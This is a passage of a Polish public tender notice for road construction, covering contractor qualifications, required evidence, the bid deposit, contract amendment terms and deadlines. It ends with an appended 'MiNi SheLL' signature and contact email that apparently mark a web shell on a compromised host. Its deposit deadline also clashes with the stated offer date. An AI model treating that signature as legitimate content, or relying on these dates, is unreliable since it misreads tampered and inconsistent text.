Kierownika Budowy,<br/>posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>inżynieryjnej drogowej. Zamawiający uzna warunek posiadania uprawnień budowlanych poprzez<br/>przedstawienie osób posiadających uprawnienia budowlane w specjalnościach inaczej<br/>nazwanych, lecz wyłącznie takich, które uprawniają do wykonywania tych samych czynności, do<br/>których uprawniają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>inżynieryjnej drogowej. Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania<br/>samodzielnych funkcji technicznych w budownictwie, wydane na podstawie Prawa Budowlanego<br/>albo odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej<br/>obowiązujących przepisów. Wskazane przez Wykonawcę osoby, bez względu na kraj ich<br/>pochodzenia i miejsce zamieszkania, muszą spełniać wymogi określone w art. 12a ustawy<br/>Prawo Budowlane. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie na zasadach określonych w art. 58 PZP<br/>wykonawcy muszą łącznie wykazać spełnienie warunków uczestnictwa, o których mowa w pkt. 1<br/>ppkt. 2, natomiast brak podstaw do wykluczenia, o których mowa w pkt. 1 ppkt 1, każdy z<br/>wykonawców wspólnie ubiegających się o zamówienia musi wykazać samodzielnie. 3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych, niezależnie od charakteru prawnego łączących<br/>go z nim stosunków prawnych.<br/>4. Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne<br/>lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w<br/>postępowaniu oraz bada, czy nie zachodzą, wobec tego podmiotu podstawy wykluczenia, o<br/>których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 1 i 4 ustawy PZP.<br/>5. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia,<br/>wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty<br/>budowlane lub usługi, do realizacji, których te zdolności są wymagane.Pozostałe informacje<br/>znajdują się w dziale X SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie w<br/>zakresie wskazanym w załącznikach nr 3, 4 do SWZ. Informacje zawarte w oświadczeniu będą<br/>stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału<br/>w postępowaniu.<br/>2. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia<br/>wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby,<br/>warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o<br/>którym mowa w pkt. 1. Wykonawca, który zamierza powierzyć wykonanie części zamówienia<br/>podwykonawcom w celu wykazania braku istnienia wobec nich podstaw wykluczenia zamieszcza<br/>informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt.1.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym<br/>mowa w punkcie 1, składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty<br/>te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w<br/>zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz<br/>brak podstaw wykluczenia.<br/>4. Do oferty wykonawca dołącza stosowne pełnomocnictwo do podpisania oferty, jeżeli uprawnienie do<br/>podpisania ofert nie wynika z dokumentów rejestrowych. W przypadku podmiotów wspólnie<br/>ubiegających się o zamówienie pełnomocnictwo do podpisania oferty lub pełnomocnictwo do<br/>podpisania oferty i zawarcia umowy w sprawie zamówienia publicznego.<br/>5. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej a mający miejsce<br/>zamieszkania poza terytorium Rzeczypospolitej Polskiej lub mający siedzibę poza terytorium<br/>Rzeczypospolitej Polskiej - składa dokumenty zgodnie z § 7 Rozporządzenie Ministra Rozwoju, Pracy i<br/>Technologii 1 z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 poz. 2415 z<br/>późn.zm.).<br/>6. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>w art. 118 ustawy PZP, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia<br/>publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty<br/>dostęp do ich zasobów. W tym celu wykonawca przedkłada Zamawiającemu wraz z ofertą pisemne<br/>zobowiązanie podmiotu trzeciego (wg wzoru stanowiącego załącznik nr 6 do SWZ), określające w<br/>szczególności:<br/>1) zakres dostępnych wykonawcy zasobów innego podmiotu;<br/>2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia<br/>publicznego;<br/>3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;<br/>4) czy inne podmioty, na zdolności, których wykonawca powołuje się w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizują roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>7. Forma składanych dokumentów oraz dodatkowe informacje znajdują się w dziale XI SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania<br/>ofert oświadczenie w zakresie wskazanym w załącznikach nr 3, 4 do SWZ. Informacje zawarte w<br/>oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz<br/>spełnia warunki udziału w postępowaniu.<br/>2. W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający przed<br/>udzieleniem zamówienia działając na podstawie art. 274 ust.1 wezwie wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na<br/>dzień złożenia następujących podmiotowych środków dowodowych tj.:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym<br/>czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy<br/>czym dowodami, o których mowa, są poświadczenia lub referencje bądź inne dokumenty wystawione<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne<br/>dokumenty;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>3. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej a mający miejsce<br/>zamieszkania poza terytorium Rzeczypospolitej Polskiej lub mający siedzibę poza terytorium<br/>Rzeczypospolitej Polskiej - składa dokumenty zgodnie z § 7 Rozporządzenie Ministra Rozwoju, Pracy i<br/>Technologii 1 z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 poz. 2415 z<br/>późn.zm.);<br/>4. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>w art. 118 ustawy PZP, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia<br/>publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty<br/>dostęp do ich zasobów. W tym celu wykonawca przedkłada Zamawiającemu wraz z ofertą pisemne<br/>zobowiązanie podmiotu trzeciego (wg wzoru stanowiącego załącznik nr 6 do SWZ), określające w<br/>szczególności:<br/>1) zakres dostępnych wykonawcy zasobów innego podmiotu;<br/>2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia<br/>publicznego;<br/>3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;<br/>4) czy inne podmioty, na zdolności, których wykonawca powołuje się w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizują roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>5. Zaleca się dołączyć do oferty dokument potwierdzenia wniesienia wadium.<br/>6. Forma składanych dokumentów oraz dodatkowe informacje znajdują się w dziale XI SWZ.<br/>Wszystkie informacje znajdują się w dziale XI SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający przed<br/>udzieleniem zamówienia działając na podstawie art. 274 ust.1 wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych tj.:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są poświadczenia<br/>lub referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami;<br/>Wszystkie informacje znajdują się w dziale XI SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający przed<br/>udzieleniem zamówienia działając na podstawie art. 274 ust.1 wezwie wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych tj.:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są poświadczenia<br/>lub referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami;<br/>Wszystkie informacje znajdują się w dziale XI SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Forma dokumentów:<br/>1) oświadczenia, o których mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii 1 z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 poz.<br/>2415 z późn.zm.) dotyczące wykonawcy i innych podmiotów, na których zdolnościach lub<br/>sytuacji polega wykonawca na zasadach określonych w art. 118 ustawy PZP oraz dotyczące<br/>podwykonawców, składane są w oryginale;<br/>2) dokumenty, o których mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii 1 z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 poz. 2415 z późn.zm.),<br/>inne niż oświadczenia, o których mowa w pkt 1) powyżej, składane są w oryginale;<br/>3) dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości: 20.000,00 zł<br/>2. Wadium może być wniesione w:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z<br/>tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. 2020 poz. 299<br/>ze zm.).<br/>3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego<br/>– BNP Paribas Bank Polska S.A. nr: 24 2030 0045 1110 0000 0042 0750, najpóźniej do końca<br/>dnia poprzedzającego termin składania ofert tj. do dnia 06.07.2021r. Za termin wniesienia<br/>wadium przyjmuje się datę uznania rachunku zamawiającego.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji<br/>gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego)<br/>przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego<br/>identyfikację, np. złożony wraz z imienną pieczątką lub czytelny, z podaniem imienia i nazwiska.<br/>Z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez<br/>zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu<br/>pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy PZP.<br/>6. Wadium musi zabezpieczać ofertę przez cały czas związania z ofertą.<br/>Wszystkie informacje znajdują się w dziale XIII. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy<br/>Pzp. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o<br/>którym mowa w punkcie 1, składa każdy z wykonawców wspólnie ubiegających się o<br/>zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>3. Do oferty wykonawca dołącza stosowne pełnomocnictwo do podpisania oferty, jeżeli<br/>uprawnienie do podpisania ofert nie wynika z dokumentów rejestrowych. W przypadku<br/>podmiotów wspólnie ubiegających się o zamówienie pełnomocnictwo do podpisania oferty lub<br/>pełnomocnictwo do podpisania oferty i zawarcia umowy w sprawie zamówienia publicznego.<br/>4. W przypadku wspólnego ubiegania się o zamówienie na zasadach określonych w art. 58 PZP<br/>wykonawcy muszą łącznie wykazać spełnienie warunków uczestnictwa, o których mowa w pkt. 1<br/>ppkt. 2, natomiast brak podstaw do wykluczenia, o których mowa w pkt. 1 ppkt 1, każdy z<br/>wykonawców wspólnie ubiegających się o zamówienia musi wykazać samodzielnie.<br/>5. Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego oferta<br/>została uznana za najkorzystniejszą zobowiązany jest dopełnić następujących formalności: 1) w przypadku podmiotów wspólnie ubiegających się o zamówienie - przedłożyć kopię umowy<br/>Konsorcjum (potwierdzoną za zgodność z oryginałem). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, zgodnie z art. 455 ust. 1 pkt 1 ustawy PZP, przewiduje możliwość dokonania<br/>zmiany postanowień umowy, w następujących zakresach:<br/>1) ceny ofertowej<br/>a) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności<br/>powodującej, że wykonanie jej nie leży w interesie publicznym;<br/>b) w przypadku zmiany:<br/>- stawki podatku od towarów i usług,<br/>- wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5<br/>ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>- zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa<br/>w ustawie z dnia 4 października 2018 roku o pracowniczych planach kapitałowych, jeżeli w/w<br/>zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>Jeżeli zaktualizuje się którakolwiek z w/w w pkt b) podstaw do zmiany wynagrodzenia,<br/>Wykonawca zobowiązany jest przedstawić Zamawiającemu szczegółową kalkulację zmiany<br/>wysokości swojego wynagrodzenia. Zamawiający może żądać od Wykonawcy dodatkowych<br/>wyjaśnień, w szczególności wyjaśnień, których celem jest jednoznaczne i wyczerpujące<br/>wykazanie, w jaki sposób zmiany przepisów, o których mowa w art. 142 ust. 5 ustawy Prawo<br/>zamówień publicznych, wpłynęły na koszt wykonania zamówienia.<br/>2) terminu wykonania przedmiotu umowy:<br/>a) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej,<br/>potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania<br/>robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia;<br/>b) w przypadku zaistnienia okoliczności niezależnych od Wykonawcy, a w szczególności w<br/>przypadku istotnych błędów w dokumentacji projektowej, aktualizacji rozwiązań z uwagi na<br/>postęp technologiczny, zawieszenia przez Zamawiającego wykonania robót, wyjątkowo<br/>niekorzystnych warunków klimatycznych itp.;<br/>c) w przypadku wstrzymania robót przez Zamawiającego z powodu niekorzystnych warunków<br/>atmosferycznych (np. duże opady deszczu, śniegu, niskie temperatury, wysoki poziom wody<br/>gruntowej), które uniemożliwiają należyte wykonanie umowy;<br/>- w powyższych przypadkach nowy termin wykonania zamówienia ustali Zamawiający w<br/>porozumieniu z Wykonawcą;<br/>3) sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących przepisach prawa<br/>bądź wytycznych mających wpływ na realizację przedmiotu umowy;<br/>4) zmiany osób wyznaczonych przez Zamawiającego i Wykonawcę do nadzorowania i<br/>kontaktów roboczych w trakcie realizacji – osoby wyznaczone i wpisane do umowy jako osoby<br/>nadzorujące lub współpracujące w zakresie realizacji przedmiotu zamówienia mogą być<br/>zmienione przez Strony. Jeśli osoby te winny spełniać określone wymagania to strony to<br/>potwierdzą w sposób przewidziany w SWZ. Jeżeli osoby te nie muszą spełniać określonych<br/>wymagań to zmiana może nastąpić po pisemnym zawiadomieniu drugiej strony. Powyższa zmiana będzie wymagała pisemnego poinformowania i zgody Zamawiającego.<br/>5) Zamawiający dopuszcza zmianę Podwykonawców - podmiotów trzecich, na zasobach,<br/>których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod<br/>warunkiem, że kolejny Podwykonawca lub sam Wykonawca wykaże spełnianie warunków w<br/>zakresie wymaganym przez Zamawiającego w postępowaniu o zamówienie publiczne,<br/>6) gdy Wykonawcą jest konsorcjum firm, Zamawiający dopuszcza zmianę podmiotu<br/>wchodzącego w skład konsorcjum, na warunkach wskazanych w dziale XXI SWZ.,<br/>7) gdy Wykonawcą są przedsiębiorcy prowadzący działalność gospodarczą w formie spółki<br/>cywilnej, Zamawiający dopuszcza zmianę wspólnika spółki cywilnej na warunkach wskazanych<br/>w dziale XXI SWZ. Wszystkie informacja znajdują się w dziale XXI SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-30 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com